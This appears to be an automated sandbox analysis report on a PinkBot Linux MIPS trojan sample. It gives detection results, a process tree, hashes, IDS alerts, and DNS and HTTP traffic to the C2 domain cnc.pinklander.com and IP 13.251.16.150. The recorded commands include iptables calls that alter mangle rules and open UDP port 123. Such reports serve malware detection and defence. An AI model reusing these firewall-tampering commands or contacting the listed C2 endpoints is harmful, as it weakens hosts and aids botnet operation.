Source: /bin/sh (PID: 5653)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5665)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5621)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior
Source: /bin/sh (PID: 5624)Iptables executable: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: /bin/sh (PID: 5674)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 1088
Source: /tmp/file.elf (PID: 5518)Sleeps longer then 60s: 300.0sJump to behavior
Source: /tmp/file.elf (PID: 5514)Queries kernel information via 'uname': Jump to behavior
Source: file.elf, 5514.1.00007fff95757000.00007fff95778000.rw-.sdmp, file.elf, 5617.1.00007fff95757000.00007fff95778000.rw-.sdmp, file.elf, 5670.1.00007fff95757000.00007fff95778000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/file.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/file.elf
Source: file.elf, 5514.1.0000560063789000.0000560063810000.rw-.sdmp, file.elf, 5617.1.0000560063789000.0000560063810000.rw-.sdmp, file.elf, 5670.1.0000560063789000.0000560063810000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: file.elf, 5514.1.00007fff95757000.00007fff95778000.rw-.sdmp, file.elf, 5617.1.00007fff95757000.00007fff95778000.rw-.sdmp, file.elf, 5670.1.00007fff95757000.00007fff95778000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
Source: file.elf, 5514.1.0000560063789000.0000560063810000.rw-.sdmp, file.elf, 5617.1.0000560063789000.0000560063810000.rw-.sdmp, file.elf, 5670.1.0000560063789000.0000560063810000.rw-.sdmpBinary or memory string: ycV!/etc/qemu-binfmt/mips
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
Virtualization/Sandbox Evasion
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
System Network Configuration Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587490 Sample: file.elf Startdate: 10/01/2025 Architecture: LINUX Score: 72 65 cnc.pinklander.com 13.251.16.150, 1088, 53448, 57484 AMAZON-02US United States 2->65 69 Suricata IDS alerts for network traffic 2->69 71 Antivirus / Scanner detection for submitted sample 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Uses known network protocols on non-standard ports 2->75 11 file.elf 2->11         started        signatures3 process4 process5 13 file.elf 11->13         started        process6 15 file.elf 13->15         started        17 file.elf 13->17         started        19 file.elf sh 13->19         started        21 3 other processes 13->21 process7 23 file.elf sh 15->23         started        25 file.elf sh 15->25         started        27 file.elf sh 15->27         started        38 6 other processes 15->38 29 file.elf 17->29         started        31 file.elf 17->31         started        33 sh iptables 19->33         started        36 sh iptables 21->36         started        signatures8 40 sh iptables 23->40         started        42 sh iptables 25->42         started        44 sh iptables 27->44         started        46 file.elf sh 29->46         started        48 file.elf sh 29->48         started        50 file.elf sh 31->50         started        67 Executes the "iptables" command to insert, remove and/or manipulate rules 33->67 52 sh iptables 38->52         started        54 sh iptables 38->54         started        56 3 other processes 38->56 process9 process10 58 sh iptables 46->58         started        61 sh iptables 48->61         started        63 sh iptables 50->63         started        signatures11 77 Executes the "iptables" command to insert, remove and/or manipulate rules 58->77
SourceDetectionScannerLabelLink
file.elf66%ReversingLabsLinux.Trojan.Pink
file.elf62%VirustotalBrowse
file.elf100%AviraLINUX/Agent.nezaj
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://13.251.16.150/0%Avira URL Cloudsafe
http://%s:%d/d/index.htmlcnc.pinklander.com/tmp/pink/cache_finder_page_webhttp://%s//tmp/pink/fc_ip%0%Avira URL Cloudsafe
http://13.251.16.150:1088/d/index.html0%Avira URL Cloudsafe
http://%s:%d/d/index.html0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
cnc.pinklander.com
13.251.16.150
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://13.251.16.150:1088/d/index.htmlfalse
    • Avira URL Cloud: safe
    unknown
    http://13.251.16.150/false
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://%s:%d/d/index.htmlcnc.pinklander.com/tmp/pink/cache_finder_page_webhttp://%s//tmp/pink/fc_ip%file.elffalse
    • Avira URL Cloud: safe
    unknown
    http://%s:%d/d/index.htmlfile.elffalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    13.251.16.150
    cnc.pinklander.comUnited States
    16509AMAZON-02USfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    13.251.16.150PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
    • qaynky.biz/rss
    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/mmbextsivoeuyvtt
    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/sdnqcxpiurneql
    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/pn
    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/vcyisuboorqd
    Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
    • ifsaia.biz/laps
    invoice_96.73.exeGet hashmaliciousFormBookBrowse
    • iuzpxe.biz/tgcwttfqletfhyq
    Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
    • gcedd.biz/xindlfknrhvc
    C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
    • gcedd.biz/rw
    PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
    • ifsaia.biz/jlhpxxcq
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AMAZON-02USfile.elfGet hashmaliciousUnknownBrowse
    • 54.171.230.55
    file.elfGet hashmaliciousUnknownBrowse
    • 54.217.10.153
    https://app.planable.io/review/0OPaw36t6M_kGet hashmaliciousHTMLPhisherBrowse
    • 52.17.171.17
    https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
    • 18.245.46.98
    Undelivered Messages.htmGet hashmaliciousUnknownBrowse
    • 18.245.31.5
    arm7.elfGet hashmaliciousUnknownBrowse
    • 54.171.230.55
    Client.exeGet hashmaliciousAsyncRATBrowse
    • 35.154.189.194
    1162-201.exeGet hashmaliciousFormBookBrowse
    • 76.223.67.189
    https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
    • 52.211.89.170
    3.elfGet hashmaliciousUnknownBrowse
    • 18.151.37.43
    No context
    No context
    Process:/tmp/file.elf
    File Type:gzip compressed data, from Unix, truncated
    Category:dropped
    Size (bytes):20
    Entropy (8bit):1.2917601481809733
    Encrypted:false
    SSDEEP:3:Ftt:Xt
    MD5:7029066C27AC6F5EF18D660D5741979A
    SHA1:46C6643F07AA7F6BFE7118DE926B86DEFC5087C4
    SHA-256:59869DB34853933B239F1E2219CF7D431DA006AA919635478511FABBFC8849D2
    SHA-512:7E8E93F4A89CE7FAE011403E14A1D53544C6E6F6B6010D61129DC27937806D2B03802610D7999EAB33A4C36B0F9E001D9D76001B8354087634C1AA9C740C536F
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:....................
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):10
    Entropy (8bit):2.6464393446710153
    Encrypted:false
    SSDEEP:3:LaVTl:y
    MD5:BFA5BC71F70E92DF65DAC7D1C8F165BA
    SHA1:75E3B7F4922DE31627D25A61B1FF1328A4ABADCC
    SHA-256:8C7C18155EB93D4BAADC6898C14EDDD2095DA23804289C60651F323BAB0C1DF1
    SHA-512:F3A966CDB5264E4D886F1B5EE9FB8AA3F6FF048232A71C4A16E566365DACDB938C6DFFEF006421601291E29F4B024E743E12F7624C76B23E113E202366903409
    Malicious:false
    Reputation:low
    Preview:1736510691
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):10
    Entropy (8bit):2.6464393446710153
    Encrypted:false
    SSDEEP:3:LaVTl:y
    MD5:BFA5BC71F70E92DF65DAC7D1C8F165BA
    SHA1:75E3B7F4922DE31627D25A61B1FF1328A4ABADCC
    SHA-256:8C7C18155EB93D4BAADC6898C14EDDD2095DA23804289C60651F323BAB0C1DF1
    SHA-512:F3A966CDB5264E4D886F1B5EE9FB8AA3F6FF048232A71C4A16E566365DACDB938C6DFFEF006421601291E29F4B024E743E12F7624C76B23E113E202366903409
    Malicious:false
    Reputation:low
    Preview:1736510691
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):64
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:pjB:n
    MD5:10311431E6EFA482F2E69D5B9D192941
    SHA1:1CD04617938FD693AFA091FFD9BD71D793D595AD
    SHA-256:9EF249AEBF53BC11E0179D8296301AAB1AE68362E68DFDE28042CCA233EE31EA
    SHA-512:320E63AB594BB32FD83FF28F8C8C92D82B647006DC0AA87F1D8A892C158D126CDBD0F643FD333EAA7FDF0E1B5D4203B8A16F5322CC2A43A704379C130FFD209A
    Malicious:false
    Reputation:low
    Preview:-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):4
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:pp:j
    MD5:B74BE257D5C98576EB7D74FBE53DECE1
    SHA1:3503F3850BB04BF5FAF736BD1642066EC6D5A558
    SHA-256:774E9B190BEEA2232D5A5F7D17C17961284CD3AF11E76D25A28AF755F002E8C4
    SHA-512:699AED21719FA161B2AE2741A0A538BA1E16D11BC7C7FCC5EFECF46C68A766F10979B1287881087A7B0FA7E3225FBAA72895129367F84050B41FB040175398C7
    Malicious:false
    Reputation:low
    Preview:-1-1
    Process:/sbin/iptables
    File Type:ASCII text
    Category:dropped
    Size (bytes):164
    Entropy (8bit):3.77769731203799
    Encrypted:false
    SSDEEP:3:ULUsTt1xMJ+DRF09hZxRXWmms8IWhSN5eNKVKGv:ULUsmJ+DRKhhXWXgS4KGv
    MD5:A96BDE933539F9145925F60C195DC33A
    SHA1:C869E5E6E617623819436CE06D1074C90F2981F9
    SHA-256:9211E22FDC170B0E2B70FB4954E52A74C0D73B3DF4CAF9EB806B25A879F24F7E
    SHA-512:034822D25CAD5D0C6F9B930AA72549DA6FD1C770BF13F721563E3F3018E2F33579E6E5B112672C3259470A9CF5FA375AC8D87876AB7B77AEC15F1124677EF654
    Malicious:false
    Reputation:low
    Preview:Chain INPUT (policy ACCEPT).target prot opt source destination .ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:123.
    Process:/sbin/iptables
    File Type:ASCII text
    Category:dropped
    Size (bytes):91
    Entropy (8bit):3.745406018260019
    Encrypted:false
    SSDEEP:3:ULlA3Vzt1xMJ+DRF09hZxRXt:ULlI4J+DRKhhXt
    MD5:5C6B03281E68751E6D3A4555637090E4
    SHA1:FCA886FF5D09EA5CACB19B0E72773F407539DEC4
    SHA-256:88A1A8CB11B5CFFE4CACF01CC5D2154DF6CC26DA8E2362F3A187B56AE7537F10
    SHA-512:AF027E266925B884149B73710669E29295EAA01496628086EDFF4E77C6980E87890EC9905C75C5517EA5D07C7CA2A5A6E6B32CF8FE336436112DDC7D120F1946
    Malicious:false
    Reputation:low
    Preview:Chain OUTPUT (policy ACCEPT).target prot opt source destination .
    Process:/tmp/file.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:Tg4n:Tg4
    MD5:256E722E092BB0C35A003C120A06CD0D
    SHA1:F0282586CBD36C0015025C0200A4208BB6AD130C
    SHA-256:E8B8C21D838E7B51627767942CC6FDF182E5E409C634A7C85002D1109161B649
    SHA-512:4F52DCF7944A06CE22BF363BD40E32DD842EEC3FEDEBAC50DAF1A2705B095BEBD0AB4E8313EEAE238B82E5BF23D5C95D722A4D36F578E6551C502E305CE6603C
    Malicious:false
    Reputation:low
    Preview:/tmp/file.elf.
    Process:/tmp/file.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:Tg4n:Tg4
    MD5:256E722E092BB0C35A003C120A06CD0D
    SHA1:F0282586CBD36C0015025C0200A4208BB6AD130C
    SHA-256:E8B8C21D838E7B51627767942CC6FDF182E5E409C634A7C85002D1109161B649
    SHA-512:4F52DCF7944A06CE22BF363BD40E32DD842EEC3FEDEBAC50DAF1A2705B095BEBD0AB4E8313EEAE238B82E5BF23D5C95D722A4D36F578E6551C502E305CE6603C
    Malicious:false
    Preview:/tmp/file.elf.
    Process:/tmp/file.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:Tg4n:Tg4
    MD5:256E722E092BB0C35A003C120A06CD0D
    SHA1:F0282586CBD36C0015025C0200A4208BB6AD130C
    SHA-256:E8B8C21D838E7B51627767942CC6FDF182E5E409C634A7C85002D1109161B649
    SHA-512:4F52DCF7944A06CE22BF363BD40E32DD842EEC3FEDEBAC50DAF1A2705B095BEBD0AB4E8313EEAE238B82E5BF23D5C95D722A4D36F578E6551C502E305CE6603C
    Malicious:false
    Preview:/tmp/file.elf.
    File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
    Entropy (8bit):5.30394734370437
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:file.elf
    File size:610'960 bytes
    MD5:5ae1fec20c2f720269c2dc94732187e8
    SHA1:aff86a5d4a620141a54ad0664e6f9182475ee036
    SHA256:41f7ed67877a3d6805d60ad5ea91816f2092012fa316f9fbf1b8fbb953fbada5
    SHA512:2d4f1a752b8909fbca46ebef07f75938630d614bcb93dc96867947bc898520bd54abf46f02f752d2320e11198b8deecfd88a371290e440dec9bb24e5cb9b0bbe
    SSDEEP:6144:7J17kAqmRpuBYXZP3qWI5kaiLCZGNuWequsVOqS5Pxvr3+3awRV4v51u/HLGqeiH:P/pu+P/NuSSf+KwRAp8o8dskv
    TLSH:65D4A6366FB1AB5EE279473186F73AF0C36623C226A19541D27DC6189E7021D0CDFEA1
    File Content Preview:.ELF.....................@.p...4.........4. ...(....p........@...@...........................@...@....-`..-`..............0..J0..J0..."....d..............0\.J0\.J0\................dt.Q.................................................J..<...'......!'......

    ELF header

    Class:ELF32
    Data:2's complement, big endian
    Version:1 (current)
    Machine:MIPS R3000
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x400170
    Flags:0x1007
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:5
    Section Header Offset:0
    Section Header Size:40
    Number of Section Headers:0
    Header String Table Index:0
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    <unknown>0xd40x4000d40x4000d40x180x181.45750x4R 0x4
    LOAD0x00x4000000x4000000x92d600x92d605.30420x5R E0x10000
    LOAD0x930000x4a30000x4a30000x22900x128d644.72580x6RW 0x10000
    TLS0x9305c0x4a305c0x4a305c0x00x80.00000x4R 0x4
    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
    2025-01-10T13:04:49.263621+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.14344848.8.8.853UDP
    2025-01-10T13:04:50.270265+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.14469948.8.8.853UDP
    2025-01-10T13:04:52.617273+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.14500588.8.8.853UDP
    2025-01-10T13:04:53.618665+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.14534628.8.8.853UDP
    2025-01-10T13:04:56.354704+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.1457484TCP
    2025-01-10T13:04:56.354704+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.1457484TCP
    TimestampSource PortDest PortSource IPDest IP
    Jan 10, 2025 13:04:51.323824883 CET534481088192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:51.329852104 CET10885344813.251.16.150192.168.2.14
    Jan 10, 2025 13:04:51.329963923 CET534481088192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:51.438118935 CET534481088192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:51.443183899 CET10885344813.251.16.150192.168.2.14
    Jan 10, 2025 13:04:52.608875036 CET10885344813.251.16.150192.168.2.14
    Jan 10, 2025 13:04:52.608946085 CET534481088192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:52.609081984 CET10885344813.251.16.150192.168.2.14
    Jan 10, 2025 13:04:52.615622997 CET534481088192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:52.620549917 CET10885344813.251.16.150192.168.2.14
    Jan 10, 2025 13:04:54.620611906 CET5748480192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:54.625720024 CET805748413.251.16.150192.168.2.14
    Jan 10, 2025 13:04:54.625808954 CET5748480192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:54.722671032 CET5748480192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:54.727668047 CET805748413.251.16.150192.168.2.14
    Jan 10, 2025 13:04:55.991872072 CET805748413.251.16.150192.168.2.14
    Jan 10, 2025 13:04:55.991982937 CET805748413.251.16.150192.168.2.14
    Jan 10, 2025 13:04:55.992042065 CET5748480192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:56.033735037 CET5748480192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:56.349677086 CET5748480192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:56.349678040 CET5748480192.168.2.1413.251.16.150
    Jan 10, 2025 13:04:56.354703903 CET805748413.251.16.150192.168.2.14
    Jan 10, 2025 13:04:56.354784966 CET5748480192.168.2.1413.251.16.150
    TimestampSource PortDest PortSource IPDest IP
    Jan 10, 2025 13:04:49.263621092 CET3448453192.168.2.148.8.8.8
    Jan 10, 2025 13:04:49.361524105 CET53344848.8.8.8192.168.2.14
    Jan 10, 2025 13:04:50.270265102 CET4699453192.168.2.148.8.8.8
    Jan 10, 2025 13:04:50.375885963 CET53469948.8.8.8192.168.2.14
    Jan 10, 2025 13:04:52.617273092 CET5005853192.168.2.148.8.8.8
    Jan 10, 2025 13:04:52.716103077 CET53500588.8.8.8192.168.2.14
    Jan 10, 2025 13:04:53.618664980 CET5346253192.168.2.148.8.8.8
    Jan 10, 2025 13:04:53.625801086 CET53534628.8.8.8192.168.2.14
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Jan 10, 2025 13:04:49.263621092 CET192.168.2.148.8.8.80xb0f2Standard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:50.270265102 CET192.168.2.148.8.8.80x5641Standard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:52.617273092 CET192.168.2.148.8.8.80xfca5Standard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:53.618664980 CET192.168.2.148.8.8.80xaea6Standard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jan 10, 2025 13:04:49.361524105 CET8.8.8.8192.168.2.140xb0f2No error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:50.375885963 CET8.8.8.8192.168.2.140x5641No error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:52.716103077 CET8.8.8.8192.168.2.140xfca5No error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:53.625801086 CET8.8.8.8192.168.2.140xaea6No error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    • 13.251.16.150:1088
    • 13.251.16.150
    Session IDSource IPSource PortDestination IPDestination Port
    0192.168.2.145344813.251.16.1501088
    TimestampBytes transferredDirectionData
    Jan 10, 2025 13:04:51.438118935 CET294OUTGET /d/index.html HTTP/1.1
    Host: 13.251.16.150:1088
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: zh-cn,zh;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER
    Accept-Encoding: gzip


    Session IDSource IPSource PortDestination IPDestination Port
    1192.168.2.145748413.251.16.15080
    TimestampBytes transferredDirectionData
    Jan 10, 2025 13:04:54.722671032 CET291OUTGET / HTTP/1.1
    Host: 13.251.16.150
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: zh-cn,zh;q=0.5
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.7.0.18838
    Accept-Encoding: gzip
    Jan 10, 2025 13:04:55.991872072 CET474INHTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 12:04:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b7ede1f717a30d71c62812d94d5fc974|8.46.123.189|1736510695|1736510695|0|1|0; path=/; domain=13.251.16.150; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Content-Encoding: gzip
    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 140


    System Behavior

    Start time (UTC):12:04:48
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:/tmp/file.elf
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:48
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:48
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:07
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:07
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:07
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:07
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:23
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

    Start time (UTC):12:05:23
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:23
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
